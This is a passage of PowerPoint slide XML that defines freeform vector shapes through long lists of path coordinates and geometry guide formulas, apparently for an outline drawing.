                      <a:pt x="960" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="958" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="956" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="952" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="947" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="945" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="941" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="938" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="934" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="929" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="924" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="921" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="910" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="909" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="912" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="912" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="912" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="912" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="911" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="912" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="911" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="907" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="898" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="897" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="893" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="892" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="890" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="887" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="885" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="879" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="874" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="870" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="867" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="865" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="862" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="860" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="860" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="863" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="864" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="860" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="853" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="849" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="846" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="844" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="841" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="829" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="821" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="810" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="806" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="803" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="801" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="800" y="317"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="797" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="788" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="783" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="333"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="759" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="754" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="752" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="753" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="759" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="327"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="755" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="754" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="755" y="323"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="762" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="769" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="757" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="752" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="751" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="748" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="739" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="737" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="732" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="728" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723" y="322"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="722" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="721" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="719" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="716" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="712" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="710" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="705" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="702" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="700" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="697" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="695" y="343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="695" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="697" y="349"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="707" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="715" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="717" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="717" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="716" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="717" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="719" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="729" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="734" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="738" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="742" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="746" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="748" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="754" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="765" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="768" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="773" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="764" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="749" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="744" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="743" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="739" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="738" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="738" y="392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="737" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="734" y="392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="735" y="396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="734" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="730" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="720" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="719" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="720" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="729" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="735" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="738" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="741" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="747" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="746" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="747" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="752" y="465"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="755" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="759" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="474"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="755" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="756" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="759" y="485"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="491"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="760" y="495"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="756" y="495"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="752" y="497"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="502"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="739" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="734" y="506"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="739" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="742" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="749" y="505"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="752" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="753" y="505"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="757" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="760" y="511"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="511"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="512"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="762" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="759" y="517"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="757" y="519"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="760" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="760" y="523"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="529"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="756" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="757" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="755" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="754" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="751" y="539"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="750" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="746" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="743" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="742" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="741" y="559"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="736" y="562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="735" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="733" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="729" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="726" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="728" y="575"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="726" y="579"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="727" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="726" y="586"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="721" y="590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="720" y="592"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="718" y="595"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="716" y="600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="712" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="709" y="607"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="705" y="606"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="702" y="605"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="606"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="700" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="700" y="615"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="694" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="692" y="621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="623"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="683" y="626"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="679" y="628"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="678" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="678" y="632"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="634"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="673" y="634"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="665" y="637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="659" y="637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="656" y="639"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="653" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="649" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="648" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="640" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="632" y="637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="631" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="631" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="628" y="649"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="650"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="622" y="648"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="621" y="650"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="621" y="652"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="653"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="616" y="654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="613" y="655"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="655"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="605" y="653"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="604" y="654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="601" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="594" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="660"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="585" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="668"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="669"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="673"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="674"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="676"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="575" y="679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="674"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="668"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="659"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="657"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="566" y="659"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="660"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="652"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="653"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="657"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="543" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="657"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="657"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="655"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="524" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="648"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="521" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="524" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="517" y="634"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="502" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="500" y="628"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="496" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="469" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="456" y="637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449" y="640"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36348" name="Freeform 80"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3220" y="3110"/>
                <a:ext cx="167" cy="278"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 167"/>
                  <a:gd name="T1" fmla="*/ 278 h 278"/>
                  <a:gd name="T2" fmla="*/ 28 w 167"/>
                  <a:gd name="T3" fmla="*/ 264 h 278"/>
                  <a:gd name="T4" fmla="*/ 27 w 167"/>
                  <a:gd name="T5" fmla="*/ 253 h 278"/>
                  <a:gd name="T6" fmla="*/ 26 w 167"/>
                  <a:gd name="T7" fmla="*/ 231 h 278"/>
                  <a:gd name="T8" fmla="*/ 18 w 167"/>
                  <a:gd name="T9" fmla="*/ 211 h 278"/>
                  <a:gd name="T10" fmla="*/ 18 w 167"/>
                  <a:gd name="T11" fmla="*/ 197 h 278"/>
                  <a:gd name="T12" fmla="*/ 34 w 167"/>
                  <a:gd name="T13" fmla="*/ 179 h 278"/>
                  <a:gd name="T14" fmla="*/ 36 w 167"/>
                  <a:gd name="T15" fmla="*/ 167 h 278"/>
                  <a:gd name="T16" fmla="*/ 44 w 167"/>
                  <a:gd name="T17" fmla="*/ 156 h 278"/>
                  <a:gd name="T18" fmla="*/ 38 w 167"/>
                  <a:gd name="T19" fmla="*/ 139 h 278"/>
                  <a:gd name="T20" fmla="*/ 43 w 167"/>
                  <a:gd name="T21" fmla="*/ 130 h 278"/>
                  <a:gd name="T22" fmla="*/ 42 w 167"/>
                  <a:gd name="T23" fmla="*/ 109 h 278"/>
                  <a:gd name="T24" fmla="*/ 34 w 167"/>
                  <a:gd name="T25" fmla="*/ 99 h 278"/>
                  <a:gd name="T26" fmla="*/ 13 w 167"/>
                  <a:gd name="T27" fmla="*/ 91 h 278"/>
                  <a:gd name="T28" fmla="*/ 1 w 167"/>
                  <a:gd name="T29" fmla="*/ 86 h 278"/>
                  <a:gd name="T30" fmla="*/ 0 w 167"/>
                  <a:gd name="T31" fmla="*/ 78 h 278"/>
                  <a:gd name="T32" fmla="*/ 16 w 167"/>
                  <a:gd name="T33" fmla="*/ 69 h 278"/>
                  <a:gd name="T34" fmla="*/ 44 w 167"/>
                  <a:gd name="T35" fmla="*/ 58 h 278"/>
                  <a:gd name="T36" fmla="*/ 51 w 167"/>
                  <a:gd name="T37" fmla="*/ 66 h 278"/>
                  <a:gd name="T38" fmla="*/ 63 w 167"/>
                  <a:gd name="T39" fmla="*/ 66 h 278"/>
                  <a:gd name="T40" fmla="*/ 67 w 167"/>
                  <a:gd name="T41" fmla="*/ 77 h 278"/>
                  <a:gd name="T42" fmla="*/ 62 w 167"/>
                  <a:gd name="T43" fmla="*/ 88 h 278"/>
                  <a:gd name="T44" fmla="*/ 67 w 167"/>
                  <a:gd name="T45" fmla="*/ 97 h 278"/>
                  <a:gd name="T46" fmla="*/ 78 w 167"/>
                  <a:gd name="T47" fmla="*/ 109 h 278"/>
                  <a:gd name="T48" fmla="*/ 78 w 167"/>
                  <a:gd name="T49" fmla="*/ 100 h 278"/>
                  <a:gd name="T50" fmla="*/ 82 w 167"/>
                  <a:gd name="T51" fmla="*/ 94 h 278"/>
                  <a:gd name="T52" fmla="*/ 87 w 167"/>
                  <a:gd name="T53" fmla="*/ 88 h 278"/>
                  <a:gd name="T54" fmla="*/ 84 w 167"/>
                  <a:gd name="T55" fmla="*/ 63 h 278"/>
                  <a:gd name="T56" fmla="*/ 68 w 167"/>
                  <a:gd name="T57" fmla="*/ 48 h 278"/>
                  <a:gd name="T58" fmla="*/ 64 w 167"/>
                  <a:gd name="T59" fmla="*/ 31 h 278"/>
                  <a:gd name="T60" fmla="*/ 73 w 167"/>
                  <a:gd name="T61" fmla="*/ 19 h 278"/>
                  <a:gd name="T62" fmla="*/ 88 w 167"/>
                  <a:gd name="T63" fmla="*/ 17 h 278"/>
                  <a:gd name="T64" fmla="*/ 93 w 167"/>
                  <a:gd name="T65" fmla="*/ 19 h 278"/>
                  <a:gd name="T66" fmla="*/ 111 w 167"/>
                  <a:gd name="T67" fmla="*/ 21 h 278"/>
                  <a:gd name="T68" fmla="*/ 120 w 167"/>
                  <a:gd name="T69" fmla="*/ 15 h 278"/>
                  <a:gd name="T70" fmla="*/ 128 w 167"/>
                  <a:gd name="T71" fmla="*/ 16 h 278"/>
